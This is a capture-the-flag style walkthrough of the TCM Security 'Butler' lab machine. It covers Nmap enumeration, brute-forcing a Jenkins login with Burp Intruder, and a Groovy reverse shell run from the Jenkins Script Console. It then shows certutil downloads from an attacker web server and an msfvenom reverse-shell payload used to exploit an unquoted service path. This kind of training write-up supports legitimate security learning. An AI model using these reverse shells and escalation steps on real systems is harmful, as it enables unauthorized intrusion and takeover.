Butler is the fourth vulnerable virtual machine which can be downloaded on the TCM Security website (Practical Ethical Hacking Course). Here is how I get admin access on this machine.
Difficulty : Easy / Medium
Scanning / Enumeration
Nmap scan
As usual, let’s begin with a Nmap scan :
sudo nmap -T4 -p- -A -vv 192.168.XX.XX -oN nmap_resultsNmap options reminder :
- -T4 : Timing template, 4 is for an aggressive scan. This is not a real-life scan so we can launch a “noisy” scan.
- -p- : To scan all the ports (1 to 65535)
- -A : Aggressive scan options = OS detection (-O) + version scanning (-sV) + script scanning (-sC) + traceroute
- -vv : Verbose mode
- -oN : To save the results in a file
Nmap results
Open ports
- 135 — msrpc
- 139 — smb
- 445 — smb
- 5040 — unknown
- 7680 — pando-pub ?
- 8080 — http — Jetty 9.4.41.v20210516
- Info about robots.txt
- 49664–49669 — msrpc
Checking smb
smbclient -L \\\\REMOTE_IP\\Let’s try with a blank password…
So nothing here.
Bruteforce and exploit Jenkins
Checking web site on port 8080
Open a browser and enter REMOTE_IP:8080
Here, i’ve spent lot of time to find a way to bypass this login prompt, I’ve found the Jenkins version with the error page (v2.289) and check several exploits but nothing interesting. I have tried some module with Metasploit…and…nothing.
The solution is Burp Suite + Intruder + Cluster Bomb :
Bruteforce login with BurpSuite
Intercept the request and send it to the Intruder section
Select the username value, click on Add$ button on the right and do it again for the password.
We are selecting them in order to replace them by a wordlist containing multiple values (usernames and passwords).
Then, on the same window, select the Cluster Bomb attack type. This will allow us to bruteforce username and password :
In the Payload section, select Payload set 1 and add some basic usernames like admin, administrator, user, jenkins, Jenkins
Do the same thing for the Payload set 2 (for the passwords) with Password, password, 123456, jenkins, Jenkins :
Check the result, we can see that the length of the “jenkins / jenkins” line is smaller :
Let’s try these credentials and that’s it !
Note : Even if the credentials are very easy, the way to find it is not so easy for a beginner hacker…The learning here is to always try the simplest usernames and passwords before attempting elaborated strats or something else. Personnaly, I will apply this tip each time I have to find login access.
Open a new tab in your terminal’s machine and type :
nc -lvnp 4444This will open the port 4444 to get the connection back.
Now, our machine is ready, now, it’s time to do the job on the Jenkins machine.
In Jenkins, go to Manage Jenkins :
Scroll down, in the Tools and Actions section, click on Script Console :
In the Script Console, paste this code and adapt it according to your local machine :
String host="YOUR_IP_MACHINE";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();Then, click on the button Run on the right.
Wait a few second and check in your Netcat terminal’s tab :
Final round : Privilege escalation
Winpeas
First, we are going to upload Winpeas on the remote machine, the file can be found here.
On your machine, in the directory where Winpeas64.exe is located, set up a python web server :
python3 -m http.server 7777On Windows machine, go to a writeable folder like C:\UsersButler\Downloads for example and enter :
certutil.exe -urlcache -f http://YOUR_IP_MACHINE:7777/winpeas.exe winpeas.exeExecute winpeas.exe, there are a lot of results but the most important is the section below :
This will allow us to exploit a vulnerability called “Unquoted Service Path”, if you want to learn more about it (and you will better do), you can read read this good post .
Exploit the unquoted service path
Generate a payload with msfvenom :
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP_MACHINE LPORT=6666 -f exe > Wise.exe
Set up a python web server where the Wise.exe file is located :
python3 -m http.server 7777Now, download the Wise.exe file on the vulnerable machine :
certutil.exe -urlcache -f http://YOUR_IP_MACHINE:7777/Wise.exe Wise.exeCopy the Wise.exe file in “C:\Program Files (x86)\Wise\ :
copy Wise.exe "C:\Program Files (x86)\Wise\Let’s prepare our machine to receive the shell with Netcat and the port 6666, this is the port specified when we have created the payload with msfvenom earlier :
nc -lvnp 6666Go back to the Windows machine and stop the vulnerable service :
sc stop WiseBootAssistant
We can check if the service is stopped with the following command line :
sc query WiseBootAssistant
Final step, start the service :
sc start WiseBootAssistant
Check on your machine where the port 6666 is opened :
Last words
For me, it was a really good machine and I have learnt lot a new stuff here.
Attacking Windows machines is my weak point for the moment and every tip and advice I can take is very welcome. Once I’m done with the Practical Ethical Hacking Course on TCM Security and I will follow the Windows Privilege Escalate Course to improve my skills.
